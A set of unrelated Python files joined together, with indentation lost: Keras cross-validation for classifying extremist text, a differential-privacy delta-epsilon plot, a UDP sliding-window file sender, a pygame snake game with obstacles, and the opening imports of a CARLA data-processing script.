with timer("Cross Validation for Non Violent Extremism"):
iteration = 0
for train_index, test_index in kf.split(Features):
with timer("Making nueral network for iteration : " + str(iteration + 1) + " for Non Violent Extremism"):
print("\n\n\n\nMaking nueral Network for iteration:",iteration, " for Non Violent Extremism")
iteration += 1
#Making Training and Testing Data
X_Train = [Features[x] for x in train_index]
X_Test = [Features[x] for x in test_index]
nonViolentExtremismTrain = YNonViolentExtremism[train_index]
nonViolentExtremismTest = YNonViolentExtremism[test_index]
nonViolentExtremismTest1 = [nonViolentExtremism[x] for x in test_index]
tokenisedTrain = tokenizer.texts_to_sequences(X_Train)
tokenisedTest = tokenizer.texts_to_sequences(X_Test)
max_review_length = 180
X_Train = sequence.pad_sequences(tokenisedTrain, maxlen=max_review_length,padding='post')
X_Test = sequence.pad_sequences(tokenisedTest, maxlen=max_review_length,padding='post')
#Radical
nonViolentExtremismModel = Sequential()
nonViolentExtremismModel.add(Embedding(vocabSize, 100, input_length=max_review_length,weights=[embedding_matrix]))
nonViolentExtremismModel.add(Dropout(0.2))
nonViolentExtremismModel.add(Conv1D(64, 5, activation='relu'))
nonViolentExtremismModel.add(MaxPooling1D(pool_size=4))
nonViolentExtremismModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
nonViolentExtremismModel.add(LSTM(32, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
nonViolentExtremismModel.add(LSTM(16, dropout=0.2, recurrent_dropout=0.2))
nonViolentExtremismModel.add(Dense(3, activation='sigmoid'))
nonViolentExtremismModel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
epochs = 1
print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Non Violent Extremism")
fitHistory = nonViolentExtremismModel.fit(X_Train, nonViolentExtremismTrain, epochs = 1, batch_size = 150)
trainingAccuracy = fitHistory.history['acc']
while(trainingAccuracy[0] < 0.99 or epochs < 15):
epochs += 1
print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Non Violent Extremism")
fitHistory = nonViolentExtremismModel.fit(X_Train, nonViolentExtremismTrain, epochs = 1, batch_size = 150)
trainingAccuracy = fitHistory.history['acc']
if(epochs == 100):
break
nonViolentExtremismScore = nonViolentExtremismModel.evaluate(X_Test,nonViolentExtremismTest,verbose = 100)
accuNonViolentExtremismLstm1 = nonViolentExtremismScore[1]
print("\nNon Violent Extremism Training Done for Iteration ",iteration, " for part 1 with epochs : ", epochs)
positiveViolentExtremism = [x for x in nonViolentExtremismTest if x[0] == 1]
predictNonViolentExtremism = nonViolentExtremismModel.predict_classes(X_Test, verbose = 1)
positivePredNonViolentExtremism = [x for x in predictNonViolentExtremism if x > 0]
prec1, recall1, fscore1, support1 = precision_recall_fscore_support(nonViolentExtremismTest1, predictNonViolentExtremism)
print("Number of positive Examples : ",len(positiveViolentExtremism), "\nratio : ", (len(positiveViolentExtremism) / len(nonViolentExtremismTest)), "\nPositive Predicted : ", len(positivePredNonViolentExtremism), "\naccuracy : ", accuNonViolentExtremismLstm1, "\nwrongness : ", 1 - accuNonViolentExtremismLstm1,"\n\nPrecision : ",prec1,"\nRecall : ", recall1, "\nf1Score : ", fscore1, "\nsupport : ", support1 )
gNonViolentExtremismAccu += accuNonViolentExtremismLstm1
gNonViolentExtremismPrecision[0] += prec1[0]
try:
gNonViolentExtremismPrecision[1] += prec1[1]
except:
#doNothing
print("LAla")
try:
gNonViolentExtremismPrecision[2] += prec1[2]
except:
print("LALALALA")
gNonViolentExtremismRecall[0] += recall1[0]
try:
gNonViolentExtremismRecall[1] += recall1[1]
except:
#doNothing
print("LAla")
try:
gNonViolentExtremismRecall[2] += recall1[2]
except:
print("LALALALA")
gNonViolentExtremismFScore[0] += fscore1[0]
try:
gNonViolentExtremismFScore[1] += fscore1[1]
except:
#doNothing
print("LAla")
try:
gNonViolentExtremismFScore[2] += fscore1[2]
except:
print("LALALALA")
gNonViolentExtremismEpochs += epochs
with timer("trying to clear GPU memory"):
del nonViolentExtremismModel
backend.clear_session()
for i in range(20):
gc.collect()
#######################################################################################################################
with timer("Cross Validation for Radical Violence"):
iteration = 0
for train_index, test_index in kf.split(Features):
with timer("Making nueral network for iteration : " + str(iteration + 1) + " for Radical Violence"):
print("\n\n\n\nMaking nueral Network for iteration:",iteration, " for Radical Violence")
iteration += 1
#Making Training and Testing Data
X_Train = [Features[x] for x in train_index]
X_Test = [Features[x] for x in test_index]
radicalViolenceTrain = YRadicalViolence[train_index]
radicalViolenceTest = YRadicalViolence[test_index]
radicalViolenceTest1 = [radicalViolence[x] for x in test_index]
tokenisedTrain = tokenizer.texts_to_sequences(X_Train)
tokenisedTest = tokenizer.texts_to_sequences(X_Test)
max_review_length = 180
X_Train = sequence.pad_sequences(tokenisedTrain, maxlen=max_review_length,padding='post')
X_Test = sequence.pad_sequences(tokenisedTest, maxlen=max_review_length,padding='post')
#Radical
radicalViolenceModel = Sequential()
radicalViolenceModel.add(Embedding(vocabSize, 100, input_length=max_review_length,weights=[embedding_matrix]))
radicalViolenceModel.add(Dropout(0.2))
radicalViolenceModel.add(Conv1D(64, 5, activation='relu'))
radicalViolenceModel.add(MaxPooling1D(pool_size=4))
radicalViolenceModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
radicalViolenceModel.add(LSTM(32, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
radicalViolenceModel.add(LSTM(16, dropout=0.2, recurrent_dropout=0.2))
radicalViolenceModel.add(Dense(3, activation='sigmoid'))
radicalViolenceModel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
epochs = 1
print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Violent Extremism")
fitHistory = radicalViolenceModel.fit(X_Train, radicalViolenceTrain, epochs = 1, batch_size = 150)
trainingAccuracy = fitHistory.history['acc']
while(trainingAccuracy[0] < 0.99 or epochs < 15):
epochs += 1
print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Violent Extremism")
fitHistory = radicalViolenceModel.fit(X_Train, radicalViolenceTrain, epochs = 1, batch_size = 150)
trainingAccuracy = fitHistory.history['acc']
if(epochs == 100):
break
radicalViolenceScore = radicalViolenceModel.evaluate(X_Test,radicalViolenceTest,verbose = 100)
accuRadicalViolenceLstm1 = radicalViolenceScore[1]
print("\nRadical Violence Training Done for Iteration ",iteration, " for part 1 with epochs : ", epochs)
positiveRadicalViolence = [x for x in radicalViolenceTest if x[0] == 1]
predictRadicalViolence = radicalViolenceModel.predict_classes(X_Test, verbose = 1)
positivePredRadicalViolence = [x for x in predictRadicalViolence if x > 0]
prec1, recall1, fscore1, support1 = precision_recall_fscore_support(radicalViolenceTest1, predictRadicalViolence)
print("Number of positive Examples : ",len(positiveRadicalViolence), "\nratio : ", (len(positiveRadicalViolence) / len(radicalViolenceTest)), "\nPositive Predicted : ", len(positivePredRadicalViolence), "\naccuracy : ", accuRadicalViolenceLstm1, "\nwrongness : ", 1 - accuRadicalViolenceLstm1,"\n\nPrecision : ",prec1,"\nRecall : ", recall1, "\nf1Score : ", fscore1, "\nsupport : ", support1 )
gRadicalViolenceAccu += accuRadicalViolenceLstm1
gRadicalViolencePrecision[0] += prec1[0]
try:
gRadicalViolencePrecision[1] += prec1[1]
except:
#doNothing
print("LAla")
try:
gRadicalViolencePrecision[2] += prec1[2]
except:
print("LALALALA")
gRadicalViolenceRecall[0] += recall1[0]
try:
gRadicalViolenceRecall[1] += recall1[1]
except:
#doNothing
print("LAla")
try:
gRadicalViolenceRecall[2] += recall1[2]
except:
print("LALALALA")
gRadicalViolenceFScore[0] += fscore1[0]
try:
gRadicalViolenceFScore[1] += fscore1[1]
except:
#doNothing
print("LAla")
try:
gRadicalViolenceFScore[2] += fscore1[2]
except:
print("LALALALA")
gRadicalViolenceEpochs += epochs
with timer("trying to clear GPU memory"):
del radicalViolenceModel
backend.clear_session()
for i in range(20):
gc.collect()
with timer("Cross Validation for Non Radical Violence"):
iteration = 0
for train_index, test_index in kf.split(Features):
with timer("Making nueral network for iteration : " + str(iteration + 1) + " for Non Radical Violence"):
print("\n\n\n\nMaking nueral Network for iteration:",iteration, " for Non Radical Violence")
iteration += 1
#Making Training and Testing Data
X_Train = [Features[x] for x in train_index]
X_Test = [Features[x] for x in test_index]
nonRadicalViolenceTrain = YNonRadicalViolence[train_index]
nonRadicalViolenceTest = YNonRadicalViolence[test_index]
nonRadicalViolenceTest1 = [nonRadicalViolence[x] for x in test_index]
tokenisedTrain = tokenizer.texts_to_sequences(X_Train)
tokenisedTest = tokenizer.texts_to_sequences(X_Test)
max_review_length = 180
X_Train = sequence.pad_sequences(tokenisedTrain, maxlen=max_review_length,padding='post')
X_Test = sequence.pad_sequences(tokenisedTest, maxlen=max_review_length,padding='post')
#Radical
nonRadicalViolenceModel = Sequential()
nonRadicalViolenceModel.add(Embedding(vocabSize, 100, input_length=max_review_length,weights=[embedding_matrix]))
nonRadicalViolenceModel.add(Dropout(0.2))
nonRadicalViolenceModel.add(Conv1D(64, 5, activation='relu'))
nonRadicalViolenceModel.add(MaxPooling1D(pool_size=4))
nonRadicalViolenceModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
nonRadicalViolenceModel.add(LSTM(32, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
nonRadicalViolenceModel.add(LSTM(16, dropout=0.2, recurrent_dropout=0.2))
nonRadicalViolenceModel.add(Dense(3, activation='sigmoid'))
nonRadicalViolenceModel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
epochs = 1
print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Non Violent Extremism")
fitHistory = nonRadicalViolenceModel.fit(X_Train, nonRadicalViolenceTrain, epochs = 1, batch_size = 150)
trainingAccuracy = fitHistory.history['acc']
while(trainingAccuracy[0] < 0.99 or epochs < 15):
epochs += 1
print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Non Violent Extremism")
fitHistory = nonRadicalViolenceModel.fit(X_Train, nonRadicalViolenceTrain, epochs = 1, batch_size = 150)
trainingAccuracy = fitHistory.history['acc']
if(epochs == 100):
break
nonRadicalViolenceScore = nonRadicalViolenceModel.evaluate(X_Test,nonRadicalViolenceTest,verbose = 100)
accuNonRadicalViolenceLstm1 = nonRadicalViolenceScore[1]
print("\nNon Radical Violence Training Done for Iteration ",iteration, " for part 1 with epochs : ", epochs)
positiveNonRadicalViolence = [x for x in nonRadicalViolenceTest if x[0] == 1]
predictNonRadicalViolence = nonRadicalViolenceModel.predict_classes(X_Test, verbose = 1)
positivePredNonRadicalViolence = [x for x in predictNonRadicalViolence if x > 0]
prec1, recall1, fscore1, support1 = precision_recall_fscore_support(nonRadicalViolenceTest1, predictNonRadicalViolence)
print("Number of positive Examples : ",len(positiveNonRadicalViolence), "\nratio : ", (len(positiveNonRadicalViolence) / len(nonRadicalViolenceTest)), "\nPositive Predicted : ", len(positivePredNonRadicalViolence), "\naccuracy : ", accuNonRadicalViolenceLstm1, "\nwrongness : ", 1 - accuNonRadicalViolenceLstm1,"\n\nPrecision : ",prec1,"\nRecall : ", recall1, "\nf1Score : ", fscore1, "\nsupport : ", support1 )
gNonRadicalViolenceAccu += accuNonRadicalViolenceLstm1
gNonRadicalViolencePrecision[0] += prec1[0]
try:
gNonRadicalViolencePrecision[1] += prec1[1]
except:
#doNothing
print("LAla")
try:
gNonRadicalViolencePrecision[2] += prec1[2]
except:
print("LALALALA")
gNonRadicalViolenceRecall[0] += recall1[0]
try:
gNonRadicalViolenceRecall[1] += recall1[1]
except:
#doNothing
print("LAla")
try:
gNonRadicalViolenceRecall[2] += recall1[2]
except:
print("LALALALA")
gNonRadicalViolenceFScore[0] += fscore1[0]
try:
gNonRadicalViolenceFScore[1] += fscore1[1]
except:
#doNothing
print("LAla")
try:
gNonRadicalViolenceFScore[2] += fscore1[2]
except:
print("LALALALA")
gNonRadicalViolenceEpochs += epochs
with timer("trying to clear GPU memory"):
del nonRadicalViolenceModel
backend.clear_session()
for i in range(20):
gc.collect()
with timer("Final Output"):
gViolentExtremismAccu /= 10
gViolentExtremismEpochs /= 10
gViolentExtremismPrecision = [x / 10 for x in gViolentExtremismPrecision]
gViolentExtremismRecall = [x / 10 for x in gViolentExtremismRecall]
gViolentExtremismFScore = [x / 10 for x in gViolentExtremismFScore]
gNonViolentExtremismAccu /= 10
gNonViolentExtremismEpochs /= 10
gNonViolentExtremismPrecision = [x /10 for x in gNonViolentExtremismPrecision]
gNonViolentExtremismRecall = [x / 10 for x in gNonViolentExtremismRecall]
gNonViolentExtremismFScore = [x / 10 for x in gNonViolentExtremismFScore]
gRadicalViolenceAccu /= 10
gRadicalViolenceEpochs /= 10
gRadicalViolencePrecision = [x / 10 for x in gRadicalViolencePrecision]
gRadicalViolenceRecall = [x / 10 for x in gRadicalViolenceRecall]
gRadicalViolenceFScore = [x / 10 for x in gRadicalViolenceFScore]
gNonRadicalViolenceAccu /= 10
gNonRadicalViolenceEpochs /= 10
gNonRadicalViolencePrecision = [x / 10 for x in gNonRadicalViolencePrecision]
gNonRadicalViolenceRecall = [x / 10 for x in gNonRadicalViolenceRecall]
gNonRadicalViolenceFScore = [x / 10 for x in gNonRadicalViolenceFScore]
print("\n\n\n\n")
print("Score for Violent Extremism : \n", "accuracy : ", gViolentExtremismAccu, "\nPrecision : ", gViolentExtremismPrecision, "\nRecall : ", gViolentExtremismRecall, "\nFScore : ", gViolentExtremismFScore, "\nAverageEpochs : ", gViolentExtremismEpochs)
print("\n\n\n\n")
print("Score for Non Violent Extremism : \n", "accuracy : ", gNonViolentExtremismAccu, "\nPrecision : ", gNonViolentExtremismPrecision, "\nRecall : ", gNonViolentExtremismRecall, "\nFScore : ", gNonViolentExtremismFScore, "\nAverageEpochs : ", gNonViolentExtremismEpochs)
print("\n\n\n\n")
print("Score for Radical Violence : \n", "accuracy : ", gRadicalViolenceAccu, "\nPrecision : ", gRadicalViolencePrecision, "\nRecall : ", gRadicalViolenceRecall, "\nFScore : ", gRadicalViolenceFScore, "\nAverageEpochs : ", gRadicalViolenceEpochs)
print("\n\n\n\n")
print("Score for Non Radical Violence : \n", "accuracy : ", gNonRadicalViolenceAccu, "\nPrecision : ", gNonRadicalViolencePrecision, "\nRecall : ", gNonRadicalViolenceRecall, "\nFScore : ", gNonRadicalViolenceFScore, "\nAverageEpochs : ", gNonRadicalViolenceEpochs)
|
#!/usr/bin/python
# coding=utf-8
import sys
import re
import os
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import ticker
from matplotlib.backends.backend_pdf import PdfPages
from datetime import datetime
def delta_eps_plot(plot_name, filename):
data = np.genfromtxt(filename, delimiter=',')
fig_width_pt = 300.0 # Get this from LaTeX using \showthe
inches_per_pt = 1.0 / 72.27 * 2 # Convert pt to inches
golden_mean = ((np.math.sqrt(5) - 1.0) / 2.0) # Aesthetic ratio
fig_width = fig_width_pt * inches_per_pt # width in inches
fig_height = (fig_width * golden_mean) # height in inches
# fig_height = (fig_width * 1) # height in inches
fig_size = [0.95 * fig_width, 0.95 *fig_height]
params = {'backend': 'ps',
'axes.labelsize': 20,
'legend.fontsize': 18,
'xtick.labelsize': 18,
'ytick.labelsize': 18,
'font.size': 18,
'font.family': 'times new roman'}
pdf_pages = PdfPages(os.path.join(plot_name))
plt.rcParams.update(params)
plt.axes([0.12, 0.32, 0.85, 0.63], frameon=True)
plt.rc('pdf', fonttype=42) # IMPORTANT to get rid of Type 3
colors = ['0.1', '0.2', '0.3', '0.4']
linestyles = ['-', ':', '--', '-.']
dotstyle = ['', '', '', '']
plt.plot(data[:, 0], data[:, 1], dotstyle[0], color=colors[0], linestyle=linestyles[0], linewidth=2, zorder=3,
label=r'$\mathcal{{N}}(0,{{{:d}}}^2)$'.format(150))
plt.plot(data[:, 0], data[:, 2], dotstyle[0], color=colors[1], linestyle=linestyles[1], linewidth=2, zorder=3,
label=r'$2 \cdot \mathcal{{B}}({{{:d}}}, \frac{{1}}{{2}})$'.format(22500))
plt.plot(data[:, 0], data[:, 3], dotstyle[0], color=colors[2], linestyle=linestyles[2], linewidth=2, zorder=3,
label=r'$3 \cdot \mathcal{{B}}({{{:d}}}, \frac{{1}}{{2}})$'.format(10000))
plt.plot(data[:, 0], data[:, 4], dotstyle[0], color=colors[3], linestyle=linestyles[3], linewidth=2, zorder=3,
label=r'$4 \cdot \mathcal{{B}}({{{:d}}}, \frac{{1}}{{2}})$'.format(5625))
delta_point = 0.5 * 10 ** -5
pointG = np.abs(np.array(data[:, 1]) - delta_point).argmin()
plt.text(data[pointG, 0], 1.1 * delta_point, "$\epsilon={{{:.2f}}}$".format(data[pointG, 0]))
pointB4 = np.abs(np.array(data[:, 4]) - delta_point).argmin()
plt.text(data[pointB4, 0], 1.1 * delta_point, "$\epsilon ={{{:.2f}}}$".format(data[pointB4, 0]))
plt.legend()
plt.xlabel('$\epsilon$')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))
plt.ylabel('$\delta$')
plt.ylim(ymin=0, ymax=1.5 * 10 ** -5)
plt.xlim(xmin=0.5, xmax=2.5)
plt.axhline(y=delta_point, color='0.4', linestyle='--')
#plt.legend(bbox_to_anchor=(-0.01, 0.75, 1., .102), loc=3, ncol=2, columnspacing=0.6, borderpad=0.3)
plt.grid(True, linestyle=':', color='0.6', zorder=0, linewidth=1.2)
F = plt.gcf()
F.set_size_inches(fig_size)
pdf_pages.savefig(F, bbox_inches='tight', pad_inches=0.1)
print "generated " + plot_name
plt.clf()
pdf_pages.close()
delta_eps_plot("delta-eps.pdf", "delta-eps.csv")
|
import socket
import argparse
import time
import datetime
from net_structure import Packet, decode
def packets_prepare(packet_size, file_name):
f = open(file_name, 'r')
source = f.read()
source_len = len(source)
packets = []
source_pointer = 0
packet_id = 0
while source_pointer < source_len:
packets.append(Packet('D', packet_id, source[source_pointer:source_pointer + packet_size]))
source_pointer += packet_size
packet_id += 1
return packets
def trysend(sock, content, server, port):
try:
sock.sendto(content, (server, port))
except OSError:
pass
def client(server, server_port, window_size, timeout, packet_size, packets):
start_time = time.time()
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 64 * 1024)
sock.settimeout(timeout)
total_packets = len(packets)
next_packet = 0
window = []
prep = Packet('P', total_packets, [])
prep_acked = False
while not prep_acked:
sock.sendto(prep.encode(), (server, server_port))
try:
data, addr = sock.recvfrom(packet_size)
pa = decode(data)
if pa.flag == 'A':
prep_acked = True
except socket.timeout:
continue
print('Server ACKed. Start sending KJV Bible with packet size: {0}B, window size: {1} and timeout: {2} seconds.'
.format(packet_size, window_size, timeout))
packets_sent = 0
while next_packet < total_packets or (not len(window) == 0):
while len(window) < window_size:
if next_packet >= total_packets:
break
window.append(packets[next_packet])
# sock.sendto(packets[next_packet].encode(), (server, server_port))
trysend(sock, packets[next_packet].encode(), server, server_port)
packets_sent += 1
next_packet += 1
try:
data, addr = sock.recvfrom(4)
cur_pack = decode(data)
if cur_pack.flag == 'A':
cur_elapsed = time.time() - start_time
print('{0} / {1} packets ACKed. Average speed: {2} KB/s'
.format(cur_pack.pid + 1, total_packets,
((cur_pack.pid + 1) * packet_size / 1024) / (float(cur_elapsed))), end='\r'),
i = 0
while i < len(window):
if cur_pack.pid >= window[i].pid:
del window[i]
else:
i += 1
except socket.timeout:
for i in range(len(window)):
# sock.sendto(window[i].encode(), (server, server_port))
trysend(sock, window[i].encode(), server, server_port)
packets_sent += 1
continue
print()
time_used = float(time.time() - start_time)
print('Complete! Time used: {0} seconds.'.format(time_used))
sock.close()
return time_used, packets_sent - total_packets, packet_size*(packets_sent - total_packets)
if __name__ == '__main__':
# - setup command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('server', help='The address of the server')
parser.add_argument('port', help='The port of the server')
parser.add_argument('packet_size', help='The size of each packet')
parser.add_argument('window_size', help='The size of send window')
parser.add_argument('timeout', help='The timeout for sender')
args = parser.parse_args()
_timeout = float(args.timeout)
_window = int(args.window_size)
client(args.server, int(args.port), _window, _timeout, int(args.packet_size),
packets_prepare(int(args.packet_size), 'kjv.txt'))
|
import pygame
from pygame.math import Vector2
import sys
import random
pygame.init()
# Game display surface
cell_size = 40
cell_count = 20
game_screen = pygame.display.set_mode((cell_size * cell_count,
cell_size * cell_count))
pygame.display.set_caption('Snake Game')
# To restrict program's frame rate
clock = pygame.time.Clock()
apple = pygame.image.load("Graphics/apple-image.png").convert_alpha()
game_font = pygame.font.Font("Font/PoetsenOne-Regular.ttf", 25)
class Obstacles:
def __init__(self):
self.blocks = [Vector2(14, 5), Vector2(14, 4), Vector2(13, 4), Vector2(12, 4), Vector2(11, 4),
Vector2(10, 4), Vector2(9, 4), Vector2(8, 4), Vector2(7, 4), Vector2(6, 4),
Vector2(5, 4), Vector2(5, 5), Vector2(14, 14), Vector2(14, 15), Vector2(13, 15),
Vector2(12, 15), Vector2(11, 15), Vector2(10, 15), Vector2(9, 15), Vector2(8, 15),
Vector2(7, 15), Vector2(6, 15), Vector2(5, 15), Vector2(5, 14)]
def draw_obstacle(self):
for block in self.blocks:
blocks_rect = pygame.Rect(block.x * cell_size,
block.y * cell_size,
cell_size, cell_size)
pygame.draw.rect(game_screen, (0, 100, 0), blocks_rect)
# Snake Class
class Snake:
def __init__(self):
self.head = None
self.tail = None
self.body = [Vector2(5, 10), Vector2(4, 10), Vector2(3, 10)]
self.direction = Vector2(1, 0)
self.head_up = pygame.image.load('Graphics/head_up.png').convert_alpha()
self.head_down = pygame.image.load('Graphics/head_down.png').convert_alpha()
self.head_right = pygame.image.load('Graphics/head_right.png').convert_alpha()
self.head_left = pygame.image.load('Graphics/head_left.png').convert_alpha()
self.tail_up = pygame.image.load('Graphics/tail_up.png').convert_alpha()
self.tail_down = pygame.image.load('Graphics/tail_down.png').convert_alpha()
self.tail_right = pygame.image.load('Graphics/tail_right.png').convert_alpha()
self.tail_left = pygame.image.load('Graphics/tail_left.png').convert_alpha()
self.body_vertical = pygame.image.load('Graphics/body_vertical.png').convert_alpha()
self.body_horizontal = pygame.image.load('Graphics/body_horizontal.png').convert_alpha()
self.body_tr = pygame.image.load('Graphics/body_tr.png').convert_alpha()
self.body_tl = pygame.image.load('Graphics/body_tl.png').convert_alpha()
self.body_br = pygame.image.load('Graphics/body_br.png').convert_alpha()
self.body_bl = pygame.image.load('Graphics/body_bl.png').convert_alpha()
self.crunch_sound = pygame.mixer.Sound('Sound/crunchy.wav')
def update_head_graphics(self):
relative_position = self.body[1] - self.body[0]
if relative_position == Vector2(1, 0):
self.head = self.head_left
elif relative_position == Vector2(-1, 0):
self.head = self.head_right
elif relative_position == Vector2(0, 1):
self.head = self.head_up
elif relative_position == Vector2(0, -1):
self.head = self.head_down
def update_tail_graphics(self):
relative_position = self.body[-2] - self.body[-1]
if relative_position == Vector2(1, 0):
self.tail = self.tail_left
elif relative_position == Vector2(-1, 0):
self.tail = self.tail_right
elif relative_position == Vector2(0, 1):
self.tail = self.tail_up
elif relative_position == Vector2(0, -1):
self.tail = self.tail_down
def draw_snake(self):
self.update_head_graphics()
self.update_tail_graphics()
# Using enumerate to get the index and element from array
for index, part in enumerate(self.body):
# Create a rectangle snake's body part surface
x_pos = part.x * cell_size
y_pos = part.y * cell_size
snake_rect = pygame.Rect(x_pos, y_pos,
cell_size, cell_size)
# Find which direction the snake is heading
if index == 0:
game_screen.blit(self.head, snake_rect)
elif index == len(self.body) - 1:
game_screen.blit(self.tail, snake_rect)
else:
relative_prev_part = self.body[index + 1] - part
relative_next_part = self.body[index - 1] - part
if relative_prev_part.x == relative_next_part.x:
game_screen.blit(self.body_vertical, snake_rect)
elif relative_prev_part.y == relative_next_part.y:
game_screen.blit(self.body_horizontal, snake_rect)
else:
if (relative_prev_part.x == -1 and relative_next_part.y == -1) or \
(relative_prev_part.y == -1 and relative_next_part.x == -1):
game_screen.blit(self.body_tl, snake_rect)
elif (relative_prev_part.x == -1 and relative_next_part.y == 1) or \
(relative_prev_part.y == 1 and relative_next_part.x == -1):
game_screen.blit(self.body_bl, snake_rect)
elif (relative_prev_part.x == 1 and relative_next_part.y == -1) or \
(relative_prev_part.y == -1 and relative_next_part.x == 1):
game_screen.blit(self.body_tr, snake_rect)
elif (relative_prev_part.x == 1 and relative_next_part.y == 1) or \
(relative_prev_part.y == 1 and relative_next_part.x == 1):
game_screen.blit(self.body_br, snake_rect)
def move_snake(self):
# Copy body parts from head to tail-1
body_copy = self.body[:-1]
# Create a new head that has moved in right direction
body_copy.insert(0, body_copy[0] + self.direction)
self.body = body_copy
def increase_snake(self):
body_copy = self.body[:]
body_copy.insert(0, body_copy[0] + self.direction)
self.body = body_copy
def play_crunch_sound(self):
self.crunch_sound.play()
self.crunch_sound.set_volume(0.08)
def reset(self):
self.body = [Vector2(5, 10), Vector2(4, 10), Vector2(3, 10)]
self.direction = Vector2(0, 0)
# Fruit Class
class Fruit:
def __init__(self):
# X and Y position of Fruit
self.x = random.randint(0, cell_count - 1)
self.y = random.randint(0, cell_count - 1)
self.pos = Vector2(self.x, self.y)
def draw_fruit(self):
# Create a rectangle surface using x,y coordinate, width and height.
fruit_rect = pygame.Rect(self.pos.x * cell_size,
self.pos.y * cell_size,
cell_size, cell_size)
# Draw the above fruit surface on game_screen
game_screen.blit(apple, fruit_rect)
# pygame.draw.rect(game_screen, (0, 100, 0), fruit_rect)
def respawn_fruit(self):
self.x = random.randint(0, cell_count - 1)
self.y = random.randint(0, cell_count - 1)
self.pos = Vector2(self.x, self.y)
# Game logic class
class Main:
def __init__(self):
# Create snake and fruit class objects with main class object.
self.snake = Snake()
self.fruit = Fruit()
self.obstacle = Obstacles()
self.over = pygame.mixer.Sound('Sound/game_over.wav')
def update(self):
self.snake.move_snake()
self.check_collision()
self.check_fail()
def draw_elements(self):
self.draw_grass()
self.fruit.draw_fruit()
self.snake.draw_snake()
self.draw_score()
self.obstacle.draw_obstacle()
def check_collision(self):
if self.fruit.pos == self.snake.body[0]:
self.fruit.respawn_fruit()
self.snake.increase_snake()
self.snake.play_crunch_sound()
for block in self.snake.body[1:]:
if block == self.fruit.pos:
self.fruit.respawn_fruit()
for obstacle in self.obstacle.blocks:
if obstacle == self.fruit.pos:
self.fruit.respawn_fruit()
def check_fail(self):
if not 0 <= self.snake.body[0].x < cell_count or \
not 0 <= self.snake.body[0].y < cell_count:
self.game_over()
self.over.play()
self.over.set_volume(0.08)
for block in self.snake.body[1:]:
if block == self.snake.body[0]:
self.game_over()
for block in self.obstacle.blocks:
if self.snake.body[0] == block:
self.game_over()
self.over.play()
self.over.set_volume(0.08)
# noinspection PyMethodMayBeStatic
# this because the method does not use self in its body and hence does
# not actually change the class instance. Hence the method could be static,
# i.e. callable without passing a class instance
def game_over(self):
self.snake.reset()
# noinspection PyMethodMayBeStatic
def draw_grass(self):
grass_color = (167, 209, 61)
for row in range(cell_count):
if row % 2 == 0:
for column in range(cell_count):
if column % 2 == 0:
grass_rect = pygame.Rect(column * cell_size, row * cell_size, cell_size, cell_size)
pygame.draw.rect(game_screen, grass_color, grass_rect)
else:
for column in range(cell_count):
if column % 2 != 0:
grass_rect = pygame.Rect(column * cell_size, row * cell_size, cell_size, cell_size)
pygame.draw.rect(game_screen, grass_color, grass_rect)
def draw_score(self):
score_text = str(len(self.snake.body) - 3)
score_surface = game_font.render(score_text, True, (54, 74, 12))
score_posx = int(cell_size * cell_count - 60)
score_posy = int(cell_size * cell_count - 40)
score_rect = score_surface.get_rect(center=(score_posx, score_posy))
fruit_rect = apple.get_rect(midright=(score_rect.left, score_rect.centery))
bg_rect = pygame.Rect(fruit_rect.left, fruit_rect.top,
fruit_rect.width + score_rect.width + 6, fruit_rect.height)
pygame.draw.rect(game_screen, (167, 209, 61), bg_rect)
game_screen.blit(score_surface, score_rect)
game_screen.blit(apple, fruit_rect)
pygame.draw.rect(game_screen, (0, 0, 0), bg_rect, 2)
main_game = Main()
# Creating own screen update event
SCREEN_UPDATE = pygame.USEREVENT
pygame.time.set_timer(SCREEN_UPDATE, 150)
while True:
# Start of every iteration we check for any event
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
if event.type == SCREEN_UPDATE:
main_game.update()
# On KEY DOWN event we change snake.direction
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_UP:
if main_game.snake.direction.y != 1:
main_game.snake.direction = Vector2(0, -1)
if event.key == pygame.K_DOWN:
if main_game.snake.direction.y != -1:
main_game.snake.direction = Vector2(0, 1)
if event.key == pygame.K_LEFT:
if main_game.snake.direction.x != 1:
main_game.snake.direction = Vector2(-1, 0)
if event.key == pygame.K_RIGHT:
if main_game.snake.direction.x != -1:
main_game.snake.direction = Vector2(1, 0)
game_screen.fill((175, 215, 70))
main_game.draw_elements()
# Refreshing game surface
pygame.display.update()
# Restricting while loop to run 60 times per second
clock.tick(60)
|
#!/usr/bin/env python
from abc import ABC, abstractmethod
import argparse
import gc
import os
import warnings
from pathlib import Path
from typing import Union, Generator, Tuple
import ffmpeg
import h5py
import imageio
import numpy as np
import utils
from carla_constants import *
from utils import save_data, stitch_image_tensors
import matplotlib.pyplot as plt
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
with warnings.catch_warnings():
warnings.simplefilter("ignore")
import tensorflow as tf
tf.get_logger().setLevel('ERROR')
from tqdm import tqdm
from recordings import Recording, SplitFrame
from sides import Side
def de_batch_gen(gen: Generator[np.ndarray, None, None]) -> Generator[np.ndarray, None, None]:
for a in gen:
if np.ndim(a) == 4:
for ar in a:
yield ar
elif np.ndim(a) == 3:
yield a
